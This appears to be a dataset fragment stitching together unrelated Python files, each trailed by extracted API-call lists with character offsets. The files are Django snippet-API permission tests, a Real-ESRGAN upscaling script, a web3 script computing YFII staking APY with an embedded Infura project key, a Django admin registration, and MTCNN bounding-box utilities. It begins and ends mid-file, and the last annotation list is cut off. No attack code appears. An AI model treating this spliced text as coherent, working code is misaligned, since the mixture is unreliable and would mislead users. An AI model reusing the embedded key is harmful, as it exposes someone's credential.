response.data['line_numbers'], constants.DEFAULT_LINE_NUMBERS)
self.assertFalse(response.data['embed_title'])
self.assertEqual(response.data['private'], constants.DEFAULT_PRIVATE)
self.assertIsNone(response.data['owner'])
def test_post_owner(self):
"""Snippet list POST must store currently authenticated user as the
newly created snippet's owner.
"""
self.client.force_authenticate(self.user)
response = self.post(content='foo')
self.assertEqual(response.data['owner'], self.user.pk)
def test_post_no_content(self):
"""Snippet list POST must return a 400 Bad Request response if no
content field is set.
"""
response = self.post(title='foo')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_post_oversized_title(self):
"""Snippet list POST must return a 400 Bad Request response if the
title field consists of more characters than the TITLE_MAX_LENGTH
setting indicates.
"""
title = 'a' * (constants.TITLE_MAX_LENGTH + 1)
response = self.post(content='foo', title=title)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_post_invalid(self):
"""Snippet list POST must return a 400 Bad Request response if a value
different than the available choices is set for a multiple choice
field.
"""
for field in ['language', 'style']:
response = self.post(
**{'content': 'foo', field: '123-invalid-abc'})
self.assertEqual(
response.status_code, status.HTTP_400_BAD_REQUEST)
def check_post_forbid_anonymous(self, setting):
"""Check that snippet list POST returns a 403 Forbidden response to
anonymous users if the given setting is True.
"""
expected = (
[status.HTTP_403_FORBIDDEN] + [status.HTTP_400_BAD_REQUEST] * 2)
def check(i):
response = self.post()
self.assertEqual(response.status_code, expected[i])
with constant(setting):
self.check_for_users(check)
def test_post_forbid_anonymous(self):
"""Snippet list POST must return a 403 Forbidden response to anonymous
users if the FORBID_ANONYMOUS setting is True.
"""
self.check_post_forbid_anonymous('FORBID_ANONYMOUS')
def test_post_forbid_anonymous_create(self):
"""Snippet list POST must return a 403 Forbidden response to anonymous
users if the FORBID_ANONYMOUS_CREATE setting is True.
"""
self.check_post_forbid_anonymous('FORBID_ANONYMOUS_CREATE')
def test_post_anonymous_private(self):
"""Snippet list POST must return a 400 Bad Request response to
anonymous users who attempt to create a private snippet.
"""
response = self.post(content='foo', private=True)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_pagination(self):
"""Snippet list must be able to handle pagination."""
self.check_pagination()
| [
"tests.utils.create_user",
"json.dumps",
"tests.utils.constant",
"django.urls.reverse",
"tests.utils.create_snippet"
] | [((455, 478), 'django.urls.reverse', 'reverse', (['"""snippet-list"""'], {}), "('snippet-list')\n", (462, 478), False, 'from django.urls import reverse\n'), ((927, 948), 'tests.utils.create_snippet', 'create_snippet', (['"""foo"""'], {}), "('foo')\n", (941, 948), False, 'from tests.utils import constant, create_snippet, create_user\n'), ((957, 978), 'tests.utils.create_snippet', 'create_snippet', (['"""bar"""'], {}), "('bar')\n", (971, 978), False, 'from tests.utils import constant, create_snippet, create_user\n'), ((1411, 1431), 'tests.utils.create_user', 'create_user', (['"""owner"""'], {}), "('owner')\n", (1422, 1431), False, 'from tests.utils import constant, create_snippet, create_user\n'), ((1440, 1488), 'tests.utils.create_snippet', 'create_snippet', (['"""foo"""'], {'private': '(True)', 'owner': 'owner'}), "('foo', private=True, owner=owner)\n", (1454, 1488), False, 'from tests.utils import constant, create_snippet, create_user\n'), ((1895, 1916), 'tests.utils.create_snippet', 'create_snippet', (['"""foo"""'], {}), "('foo')\n", (1909, 1916), False, 'from tests.utils import constant, create_snippet, create_user\n'), ((1925, 1963), 'tests.utils.create_snippet', 'create_snippet', (['"""bar"""'], {'owner': 'self.user'}), "('bar', owner=self.user)\n", (1939, 1963), False, 'from tests.utils import constant, create_snippet, create_user\n'), ((2126, 2157), 'tests.utils.constant', 'constant', (['"""LIST_FOREIGN"""', '(False)'], {}), "('LIST_FOREIGN', False)\n", (2134, 2157), False, 'from tests.utils import constant, create_snippet, create_user\n'), ((4857, 4874), 'tests.utils.constant', 'constant', (['setting'], {}), '(setting)\n', (4865, 4874), False, 'from tests.utils import constant, create_snippet, create_user\n'), ((751, 769), 'json.dumps', 'json.dumps', (['kwargs'], {}), '(kwargs)\n', (761, 769), False, 'import json\n')] |
import argparse
import cv2
import glob
import os
from basicsr.archs.rrdbnet_arch import RRDBNet
import time
from realesrgan import RealESRGANer
from realesrgan.archs.srvgg_arch import SRVGGNetCompact
def main():
"""Inference demo for Real-ESRGAN.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input', type=str, default='inputs', help='Input image or folder')
parser.add_argument(
'-n',
'--model_name',
type=str,
default='RealESRGAN_x4plus',
help=('Model names: RealESRGAN_x4plus | RealESRNet_x4plus | RealESRGAN_x4plus_anime_6B | RealESRGAN_x2plus'
'RealESRGANv2-anime-xsx2 | RealESRGANv2-animevideo-xsx2-nousm | RealESRGANv2-animevideo-xsx2'
'RealESRGANv2-anime-xsx4 | RealESRGANv2-animevideo-xsx4-nousm | RealESRGANv2-animevideo-xsx4'))
parser.add_argument('-o', '--output', type=str, default='results', help='Output folder')
parser.add_argument('-s', '--outscale', type=float, default=4, help='The final upsampling scale of the image')
parser.add_argument('--suffix', type=str, default='Realesrgan-4x', help='Suffix of the restored image')
parser.add_argument('-t', '--tile', type=int, default=0, help='Tile size, 0 for no tile during testing')
parser.add_argument('--tile_pad', type=int, default=10, help='Tile padding')
parser.add_argument('--pre_pad', type=int, default=0, help='Pre padding size at each border')
parser.add_argument('--face_enhance', action='store_true', help='Use GFPGAN to enhance face')
parser.add_argument('--half', action='store_true', help='Use half precision during inference')
parser.add_argument(
'--alpha_upsampler',
type=str,
default='realesrgan',
help='The upsampler for the alpha channels. Options: realesrgan | bicubic')
parser.add_argument(
'--ext',
type=str,
default='auto',
help='Image extension. Options: auto | jpg | png, auto means using the same extension as inputs')
args = parser.parse_args()
# determine models according to model names
args.model_name = args.model_name.split('.')[0]
if args.model_name in ['RealESRGAN_x4plus', 'RealESRNet_x4plus']: # x4 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x4plus_anime_6B']: # x4 RRDBNet model with 6 blocks
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x2plus']: # x2 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=2)
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx2', 'RealESRGANv2-animevideo-xsx2-nousm', 'RealESRGANv2-animevideo-xsx2'
]: # x2 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=2, act_type='prelu')
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx4', 'RealESRGANv2-animevideo-xsx4-nousm', 'RealESRGANv2-animevideo-xsx4'
]: # x4 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu')
netscale = 4
else:
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
# determine model paths
model_path = os.path.join('experiments/pretrained_models', args.model_name + '.pth')
if not os.path.isfile(model_path):
model_path = os.path.join('realesrgan/weights', args.model_name + '.pth')
if not os.path.isfile(model_path):
raise ValueError(f'Model {args.model_name} does not exist.')
# restorer
upsampler = RealESRGANer(
scale=netscale,
model_path=model_path,
model=model,
tile=args.tile,
tile_pad=args.tile_pad,
pre_pad=args.pre_pad,
half=args.half)
if args.face_enhance: # Use GFPGAN for face enhancement
from gfpgan import GFPGANer
face_enhancer = GFPGANer(
model_path='https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth',
upscale=args.outscale,
arch='clean',
channel_multiplier=2,
bg_upsampler=upsampler)
os.makedirs(args.output, exist_ok=True)
if os.path.isfile(args.input):
paths = [args.input]
else:
paths = sorted(glob.glob(os.path.join(args.input, '*')))
for idx, path in enumerate(paths):
startTime = time.perf_counter()
imgname, extension = os.path.splitext(os.path.basename(path))
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
if len(img.shape) == 3 and img.shape[2] == 4:
img_mode = 'RGBA'
else:
img_mode = None
if args.ext == 'auto':
extension = "png"
else:
extension = args.ext
if img_mode == 'RGBA': # RGBA images should be saved in png format
extension = 'png'
save_path = os.path.join(args.output, f'{imgname}-{args.suffix}.{extension}')
if os.path.exists(save_path):
continue
try:
if args.face_enhance:
_, _, output = face_enhancer.enhance(img, has_aligned=False, only_center_face=False, paste_back=True)
else:
output, _ = upsampler.enhance(img, outscale=args.outscale)
except RuntimeError as error:
print('Error', error)
print('If you encounter CUDA out of memory, try to set --tile with a smaller number.')
else:
cv2.imwrite(save_path, output)
print(f'NO.{idx}, {imgname} is done, used {round((time.perf_counter() - startTime), 4)} seconds')
if __name__ == '__main__':
main()
| [
"os.path.exists",
"cv2.imwrite",
"realesrgan.RealESRGANer",
"os.makedirs",
"argparse.ArgumentParser",
"os.path.join",
"time.perf_counter",
"os.path.isfile",
"basicsr.archs.rrdbnet_arch.RRDBNet",
"gfpgan.GFPGANer",
"os.path.basename",
"realesrgan.archs.srvgg_arch.SRVGGNetCompact",
"cv2.imread"
] | [((275, 300), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (298, 300), False, 'import argparse\n'), ((3590, 3661), 'os.path.join', 'os.path.join', (['"""experiments/pretrained_models"""', "(args.model_name + '.pth')"], {}), "('experiments/pretrained_models', args.model_name + '.pth')\n", (3602, 3661), False, 'import os\n'), ((3923, 4070), 'realesrgan.RealESRGANer', 'RealESRGANer', ([], {'scale': 'netscale', 'model_path': 'model_path', 'model': 'model', 'tile': 'args.tile', 'tile_pad': 'args.tile_pad', 'pre_pad': 'args.pre_pad', 'half': 'args.half'}), '(scale=netscale, model_path=model_path, model=model, tile=args.\n tile, tile_pad=args.tile_pad, pre_pad=args.pre_pad, half=args.half)\n', (3935, 4070), False, 'from realesrgan import RealESRGANer\n'), ((4504, 4543), 'os.makedirs', 'os.makedirs', (['args.output'], {'exist_ok': '(True)'}), '(args.output, exist_ok=True)\n', (4515, 4543), False, 'import os\n'), ((4552, 4578), 'os.path.isfile', 'os.path.isfile', (['args.input'], {}), '(args.input)\n', (4566, 4578), False, 'import os\n'), ((2267, 2358), 'basicsr.archs.rrdbnet_arch.RRDBNet', 'RRDBNet', ([], {'num_in_ch': '(3)', 'num_out_ch': '(3)', 'num_feat': '(64)', 'num_block': '(23)', 'num_grow_ch': '(32)', 'scale': '(4)'}), '(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=\n 32, scale=4)\n', (2274, 2358), False, 'from basicsr.archs.rrdbnet_arch import RRDBNet\n'), ((3673, 3699), 'os.path.isfile', 'os.path.isfile', (['model_path'], {}), '(model_path)\n', (3687, 3699), False, 'import os\n'), ((3722, 3782), 'os.path.join', 'os.path.join', (['"""realesrgan/weights"""', "(args.model_name + '.pth')"], {}), "('realesrgan/weights', args.model_name + '.pth')\n", (3734, 3782), False, 'import os\n'), ((3794, 3820), 'os.path.isfile', 'os.path.isfile', (['model_path'], {}), '(model_path)\n', (3808, 3820), False, 'import os\n'), ((4245, 4452), 'gfpgan.GFPGANer', 'GFPGANer', ([], {'model_path': '"""https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth"""', 'upscale': 'args.outscale', 'arch': '"""clean"""', 'channel_multiplier': '(2)', 'bg_upsampler': 'upsampler'}), "(model_path=\n 'https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth'\n , upscale=args.outscale, arch='clean', channel_multiplier=2,\n bg_upsampler=upsampler)\n", (4253, 4452), False, 'from gfpgan import GFPGANer\n'), ((4744, 4763), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (4761, 4763), False, 'import time\n'), ((4858, 4896), 'cv2.imread', 'cv2.imread', (['path', 'cv2.IMREAD_UNCHANGED'], {}), '(path, cv2.IMREAD_UNCHANGED)\n', (4868, 4896), False, 'import cv2\n'), ((5266, 5331), 'os.path.join', 'os.path.join', (['args.output', 'f"""{imgname}-{args.suffix}.{extension}"""'], {}), "(args.output, f'{imgname}-{args.suffix}.{extension}')\n", (5278, 5331), False, 'import os\n'), ((5343, 5368), 'os.path.exists', 'os.path.exists', (['save_path'], {}), '(save_path)\n', (5357, 5368), False, 'import os\n'), ((2485, 2574), 'basicsr.archs.rrdbnet_arch.RRDBNet', 'RRDBNet', ([], {'num_in_ch': '(3)', 'num_out_ch': '(3)', 'num_feat': '(64)', 'num_block': '(6)', 'num_grow_ch': '(32)', 'scale': '(4)'}), '(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32,\n scale=4)\n', (2492, 2574), False, 'from basicsr.archs.rrdbnet_arch import RRDBNet\n'), ((4810, 4832), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (4826, 4832), False, 'import os\n'), ((5855, 5885), 'cv2.imwrite', 'cv2.imwrite', (['save_path', 'output'], {}), '(save_path, output)\n', (5866, 5885), False, 'import cv2\n'), ((2679, 2770), 'basicsr.archs.rrdbnet_arch.RRDBNet', 'RRDBNet', ([], {'num_in_ch': '(3)', 'num_out_ch': '(3)', 'num_feat': '(64)', 'num_block': '(23)', 'num_grow_ch': '(32)', 'scale': '(2)'}), '(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=\n 32, scale=2)\n', (2686, 2770), False, 'from basicsr.archs.rrdbnet_arch import RRDBNet\n'), ((4652, 4681), 'os.path.join', 'os.path.join', (['args.input', '"""*"""'], {}), "(args.input, '*')\n", (4664, 4681), False, 'import os\n'), ((2980, 3081), 'realesrgan.archs.srvgg_arch.SRVGGNetCompact', 'SRVGGNetCompact', ([], {'num_in_ch': '(3)', 'num_out_ch': '(3)', 'num_feat': '(64)', 'num_conv': '(16)', 'upscale': '(2)', 'act_type': '"""prelu"""'}), "(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16,\n upscale=2, act_type='prelu')\n", (2995, 3081), False, 'from realesrgan.archs.srvgg_arch import SRVGGNetCompact\n'), ((3292, 3393), 'realesrgan.archs.srvgg_arch.SRVGGNetCompact', 'SRVGGNetCompact', ([], {'num_in_ch': '(3)', 'num_out_ch': '(3)', 'num_feat': '(64)', 'num_conv': '(16)', 'upscale': '(4)', 'act_type': '"""prelu"""'}), "(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16,\n upscale=4, act_type='prelu')\n", (3307, 3393), False, 'from realesrgan.archs.srvgg_arch import SRVGGNetCompact\n'), ((3437, 3526), 'basicsr.archs.rrdbnet_arch.RRDBNet', 'RRDBNet', ([], {'num_in_ch': '(3)', 'num_out_ch': '(3)', 'num_feat': '(64)', 'num_block': '(6)', 'num_grow_ch': '(32)', 'scale': '(4)'}), '(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32,\n scale=4)\n', (3444, 3526), False, 'from basicsr.archs.rrdbnet_arch import RRDBNet\n'), ((5948, 5967), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (5965, 5967), False, 'import time\n')] |
from web3 import Web3, HTTPProvider
import json
w3url = "https://mainnet.infura.io/v3/998f64f3627548bbaf2630599c1eefca"
w3 = Web3(HTTPProvider(w3url))
WETH = "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2"
YFII = "0xa1d0E215a23d7030842FC67cE582a6aFa3CCaB83"
DAI = "0x6B175474E89094C44Da98b954EedeAC495271d0F"
iUSDT = "0x72Cf258c852Dc485a853370171d46B9D29fD3184"
POOL4 = "0x3d367C9529f260B0661e1C1E91167C9319ee96cA"
yfii2dai = [YFII, WETH, DAI]
with open("abi/erc20.json") as f:
erc20ABI = json.loads(f.read())
with open("abi/uniswapRouterv2.json") as f:
uniswapABI = json.loads(f.read())
with open("abi/pool4.json") as f:
pool4ABI = json.loads(f.read())
uniswap_instance = w3.eth.contract(
abi=uniswapABI,
address=w3.toChecksumAddress("0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D"),
)
pool4_instance = w3.eth.contract(abi=pool4ABI, address=POOL4)
def getyfiiprice():
price = uniswap_instance.functions.getAmountsOut(
w3.toWei(1, "ether"), yfii2dai
).call()[-1]
return float(w3.fromWei(price, "ether"))
def _weekly_reward():
return pool4_instance.functions.rewardRate().call() / 1e18 * 60480
def _totalStakedAmount():
token_instance = w3.eth.contract(abi=erc20ABI, address=w3.toChecksumAddress(YFII))
return token_instance.functions.balanceOf(POOL4).call() / 1e18
def getDATA():
weekly_reward = (
pool4_instance.functions.rewardRate().call() / 1e6 * 7 * 24 * 60 * 60
)
token_instance = w3.eth.contract(abi=erc20ABI, address=w3.toChecksumAddress(YFII))
totalStakedAmount = token_instance.functions.balanceOf(POOL4).call() / 1e18
YFIIPrice = getyfiiprice()
TVL = totalStakedAmount * YFIIPrice
YFIWeeklyROI = (weekly_reward / TVL) * 100 / 1.01
apy = YFIWeeklyROI * 52
return {"apy": apy, "totalStakedAmount": totalStakedAmount, "TVL": TVL}
if __name__ == "__main__":
print(getDATA())
| [
"web3.HTTPProvider"
] | [((132, 151), 'web3.HTTPProvider', 'HTTPProvider', (['w3url'], {}), '(w3url)\n', (144, 151), False, 'from web3 import Web3, HTTPProvider\n')] |
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from .models import CustomUser
admin.site.register(CustomUser, UserAdmin)
| [
"django.contrib.admin.site.register"
] | [((114, 156), 'django.contrib.admin.site.register', 'admin.site.register', (['CustomUser', 'UserAdmin'], {}), '(CustomUser, UserAdmin)\n', (133, 156), False, 'from django.contrib import admin\n')] |
"""
Copyright (c) 2018-2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import OrderedDict
import cv2
import numpy as np
from ...adapters import MTCNNPAdapter
def calibrate_predictions(previous_stage_predictions, out, threshold, outputs_mapping, iou_type=None):
prob_out = outputs_mapping['probability_out']
if prob_out not in out[0]:
prob_out = prob_out + '/sink_port_0' if '/sink_port_0' not in prob_out else prob_out.replace('/sink_port_0', '')
score = out[0][prob_out][:, 1]
pass_t = np.where(score > 0.7)[0]
removed_boxes = [i for i in range(previous_stage_predictions[0].size) if i not in pass_t]
previous_stage_predictions[0].remove(removed_boxes)
previous_stage_predictions[0].scores = score[pass_t]
bboxes = np.c_[
previous_stage_predictions[0].x_mins, previous_stage_predictions[0].y_mins,
previous_stage_predictions[0].x_maxs, previous_stage_predictions[0].y_maxs,
previous_stage_predictions[0].scores
]
region_out = outputs_mapping['region_out']
if region_out not in out[0]:
region_out = (
region_out + '/sink_port_0' if '/sink_port_0' not in region_out else region_out.replace('/sink_port_0', '')
)
mv = out[0][region_out][pass_t]
if iou_type:
previous_stage_predictions[0], peek = nms(previous_stage_predictions[0], threshold, iou_type)
bboxes = np.c_[
previous_stage_predictions[0].x_mins, previous_stage_predictions[0].y_mins,
previous_stage_predictions[0].x_maxs, previous_stage_predictions[0].y_maxs,
previous_stage_predictions[0].scores
]
mv = mv[np.sort(peek).astype(int)]
x_mins, y_mins, x_maxs, y_maxs, _ = bbreg(bboxes, mv.T).T
previous_stage_predictions[0].x_mins = x_mins
previous_stage_predictions[0].y_mins = y_mins
previous_stage_predictions[0].x_maxs = x_maxs
previous_stage_predictions[0].y_maxs = y_maxs
return previous_stage_predictions
def nms(prediction, threshold, iou_type):
bboxes = np.c_[prediction.x_mins, prediction.y_mins, prediction.x_maxs, prediction.y_maxs, prediction.scores]
peek = MTCNNPAdapter.nms(bboxes, threshold, iou_type)
prediction.remove([i for i in range(prediction.size) if i not in peek])
return prediction, peek
def bbreg(boundingbox, reg):
reg = reg.T
# calibrate bounding boxes
w = boundingbox[:, 2] - boundingbox[:, 0] + 1
h = boundingbox[:, 3] - boundingbox[:, 1] + 1
bb0 = boundingbox[:, 0] + reg[:, 0] * w
bb1 = boundingbox[:, 1] + reg[:, 1] * h
bb2 = boundingbox[:, 2] + reg[:, 2] * w
bb3 = boundingbox[:, 3] + reg[:, 3] * h
boundingbox[:, 0:4] = np.array([bb0, bb1, bb2, bb3]).T
return boundingbox
def filter_valid(dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph):
mask = np.ones(len(tmph))
tmp_ys_len = (edy + 1) - dy
tmp_xs_len = (edx + 1) - dx
img_ys_len = (ey + 1) - y
img_xs_len = (ex + 1) - x
mask = np.logical_and(mask, np.logical_and(tmph > 0, tmpw > 0))
mask = np.logical_and(mask, np.logical_and(tmp_ys_len > 0, tmp_xs_len > 0))
mask = np.logical_and(mask, np.logical_and(img_xs_len > 0, img_ys_len > 0))
mask = np.logical_and(mask, np.logical_and(tmp_xs_len == img_xs_len, tmp_ys_len == img_ys_len))
return dy[mask], edy[mask], dx[mask], edx[mask], y[mask], ey[mask], x[mask], ex[mask], tmpw[mask], tmph[mask], mask
def pad(boxesA, h, w):
boxes = boxesA.copy()
tmph = boxes[:, 3] - boxes[:, 1] + 1
tmpw = boxes[:, 2] - boxes[:, 0] + 1
numbox = boxes.shape[0]
dx = np.ones(numbox)
dy = np.ones(numbox)
edx = tmpw
edy = tmph
x = boxes[:, 0:1][:, 0]
y = boxes[:, 1:2][:, 0]
ex = boxes[:, 2:3][:, 0]
ey = boxes[:, 3:4][:, 0]
tmp = np.where(ex > w)[0]
if tmp.shape[0] != 0:
edx[tmp] = -ex[tmp] + w - 1 + tmpw[tmp]
ex[tmp] = w - 1
tmp = np.where(ey > h)[0]
if tmp.shape[0] != 0:
edy[tmp] = -ey[tmp] + h - 1 + tmph[tmp]
ey[tmp] = h - 1
tmp = np.where(x < 1)[0]
if tmp.shape[0] != 0:
dx[tmp] = 2 - x[tmp]
x[tmp] = np.ones_like(x[tmp])
tmp = np.where(y < 1)[0]
if tmp.shape[0] != 0:
dy[tmp] = 2 - y[tmp]
y[tmp] = np.ones_like(y[tmp])
# for python index from 0, while matlab from 1
dy, dx = np.maximum(0, dy - 1), np.maximum(0, dx - 1)
y = np.maximum(0, y - 1)
x = np.maximum(0, x - 1)
edy = np.maximum(0, edy - 1)
edx = np.maximum(0, edx - 1)
ey = np.maximum(0, ey - 1)
ex = np.maximum(0, ex - 1)
return filter_valid(dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph)
def rerec(bboxA):
w = bboxA[:, 2] - bboxA[:, 0]
h = bboxA[:, 3] - bboxA[:, 1]
max_side = np.maximum(w, h).T
bboxA[:, 0] = bboxA[:, 0] + w * 0.5 - max_side * 0.5
bboxA[:, 1] = bboxA[:, 1] + h * 0.5 - max_side * 0.5
bboxA[:, 2:4] = bboxA[:, 0:2] + np.repeat([max_side], 2, axis=0).T
return bboxA
def cut_roi(image, prediction, dst_size, include_bound=True):
bboxes = np.c_[prediction.x_mins, prediction.y_mins, prediction.x_maxs, prediction.y_maxs, prediction.scores]
img = image.data
bboxes = rerec(bboxes)
bboxes[:, 0:4] = np.fix(bboxes[:, 0:4])
dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph, mask = pad(bboxes, *img.shape[:2])
bboxes = bboxes[mask]
numbox = bboxes.shape[0]
tempimg = np.zeros((numbox, dst_size, dst_size, 3))
for k in range(numbox):
tmp_k_h, tmp_k_w = int(tmph[k]) + int(include_bound), int(tmpw[k]) + int(include_bound)
tmp = np.zeros((tmp_k_h, tmp_k_w, 3))
tmp_ys, tmp_xs = slice(int(dy[k]), int(edy[k]) + 1), slice(int(dx[k]), int(edx[k]) + 1)
img_ys, img_xs = slice(int(y[k]), int(ey[k]) + 1), slice(int(x[k]), int(ex[k]) + 1)
tmp[tmp_ys, tmp_xs] = img[img_ys, img_xs]
tempimg[k, :, :, :] = cv2.resize(tmp, (dst_size, dst_size))
image.data = tempimg
return image
def transform_for_callback(batch_size, raw_outputs):
output_per_box = []
fq_weights = []
for i in range(batch_size):
box_outs = OrderedDict()
for layer_name, data in raw_outputs[0].items():
if layer_name in fq_weights:
continue
if layer_name.endswith('fq_weights_1'):
fq_weights.append(layer_name)
box_outs[layer_name] = data
elif data.shape[0] <= i:
box_outs[layer_name] = data
else:
box_outs[layer_name] = np.expand_dims(data[i], axis=0)
output_per_box.append(box_outs)
return output_per_box
| [
"numpy.ones_like",
"collections.OrderedDict",
"numpy.repeat",
"numpy.ones",
"numpy.logical_and",
"cv2.resize",
"numpy.where",
"numpy.fix",
"numpy.sort",
"numpy.array",
"numpy.zeros",
"numpy.expand_dims",
"numpy.maximum"
] | [((4091, 4106), 'numpy.ones', 'np.ones', (['numbox'], {}), '(numbox)\n', (4098, 4106), True, 'import numpy as np\n'), ((4116, 4131), 'numpy.ones', 'np.ones', (['numbox'], {}), '(numbox)\n', (4123, 4131), True, 'import numpy as np\n'), ((4893, 4913), 'numpy.maximum', 'np.maximum', (['(0)', '(y - 1)'], {}), '(0, y - 1)\n', (4903, 4913), True, 'import numpy as np\n'), ((4922, 4942), 'numpy.maximum', 'np.maximum', (['(0)', '(x - 1)'], {}), '(0, x - 1)\n', (4932, 4942), True, 'import numpy as np\n'), ((4953, 4975), 'numpy.maximum', 'np.maximum', (['(0)', '(edy - 1)'], {}), '(0, edy - 1)\n', (4963, 4975), True, 'import numpy as np\n'), ((4986, 5008), 'numpy.maximum', 'np.maximum', (['(0)', '(edx - 1)'], {}), '(0, edx - 1)\n', (4996, 5008), True, 'import numpy as np\n'), ((5018, 5039), 'numpy.maximum', 'np.maximum', (['(0)', '(ey - 1)'], {}), '(0, ey - 1)\n', (5028, 5039), True, 'import numpy as np\n'), ((5049, 5070), 'numpy.maximum', 'np.maximum', (['(0)', '(ex - 1)'], {}), '(0, ex - 1)\n', (5059, 5070), True, 'import numpy as np\n'), ((5710, 5732), 'numpy.fix', 'np.fix', (['bboxes[:, 0:4]'], {}), '(bboxes[:, 0:4])\n', (5716, 5732), True, 'import numpy as np\n'), ((5885, 5926), 'numpy.zeros', 'np.zeros', (['(numbox, dst_size, dst_size, 3)'], {}), '((numbox, dst_size, dst_size, 3))\n', (5893, 5926), True, 'import numpy as np\n'), ((1038, 1059), 'numpy.where', 'np.where', (['(score > 0.7)'], {}), '(score > 0.7)\n', (1046, 1059), True, 'import numpy as np\n'), ((3199, 3229), 'numpy.array', 'np.array', (['[bb0, bb1, bb2, bb3]'], {}), '([bb0, bb1, bb2, bb3])\n', (3207, 3229), True, 'import numpy as np\n'), ((3505, 3539), 'numpy.logical_and', 'np.logical_and', (['(tmph > 0)', '(tmpw > 0)'], {}), '(tmph > 0, tmpw > 0)\n', (3519, 3539), True, 'import numpy as np\n'), ((3573, 3619), 'numpy.logical_and', 'np.logical_and', (['(tmp_ys_len > 0)', '(tmp_xs_len > 0)'], {}), '(tmp_ys_len > 0, tmp_xs_len > 0)\n', (3587, 3619), True, 'import numpy as np\n'), ((3653, 3699), 'numpy.logical_and', 'np.logical_and', (['(img_xs_len > 0)', '(img_ys_len > 0)'], {}), '(img_xs_len > 0, img_ys_len > 0)\n', (3667, 3699), True, 'import numpy as np\n'), ((3733, 3799), 'numpy.logical_and', 'np.logical_and', (['(tmp_xs_len == img_xs_len)', '(tmp_ys_len == img_ys_len)'], {}), '(tmp_xs_len == img_xs_len, tmp_ys_len == img_ys_len)\n', (3747, 3799), True, 'import numpy as np\n'), ((4286, 4302), 'numpy.where', 'np.where', (['(ex > w)'], {}), '(ex > w)\n', (4294, 4302), True, 'import numpy as np\n'), ((4414, 4430), 'numpy.where', 'np.where', (['(ey > h)'], {}), '(ey > h)\n', (4422, 4430), True, 'import numpy as np\n'), ((4542, 4557), 'numpy.where', 'np.where', (['(x < 1)'], {}), '(x < 1)\n', (4550, 4557), True, 'import numpy as np\n'), ((4633, 4653), 'numpy.ones_like', 'np.ones_like', (['x[tmp]'], {}), '(x[tmp])\n', (4645, 4653), True, 'import numpy as np\n'), ((4664, 4679), 'numpy.where', 'np.where', (['(y < 1)'], {}), '(y < 1)\n', (4672, 4679), True, 'import numpy as np\n'), ((4755, 4775), 'numpy.ones_like', 'np.ones_like', (['y[tmp]'], {}), '(y[tmp])\n', (4767, 4775), True, 'import numpy as np\n'), ((4840, 4861), 'numpy.maximum', 'np.maximum', (['(0)', '(dy - 1)'], {}), '(0, dy - 1)\n', (4850, 4861), True, 'import numpy as np\n'), ((4863, 4884), 'numpy.maximum', 'np.maximum', (['(0)', '(dx - 1)'], {}), '(0, dx - 1)\n', (4873, 4884), True, 'import numpy as np\n'), ((5242, 5258), 'numpy.maximum', 'np.maximum', (['w', 'h'], {}), '(w, h)\n', (5252, 5258), True, 'import numpy as np\n'), ((6065, 6096), 'numpy.zeros', 'np.zeros', (['(tmp_k_h, tmp_k_w, 3)'], {}), '((tmp_k_h, tmp_k_w, 3))\n', (6073, 6096), True, 'import numpy as np\n'), ((6365, 6402), 'cv2.resize', 'cv2.resize', (['tmp', '(dst_size, dst_size)'], {}), '(tmp, (dst_size, dst_size))\n', (6375, 6402), False, 'import cv2\n'), ((6595, 6608), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (6606, 6608), False, 'from collections import OrderedDict\n'), ((5411, 5443), 'numpy.repeat', 'np.repeat', (['[max_side]', '(2)'], {'axis': '(0)'}), '([max_side], 2, axis=0)\n', (5420, 5443), True, 'import numpy as np\n'), ((2172, 2185), 'numpy.sort', 'np.sort', (['peek'], {}), 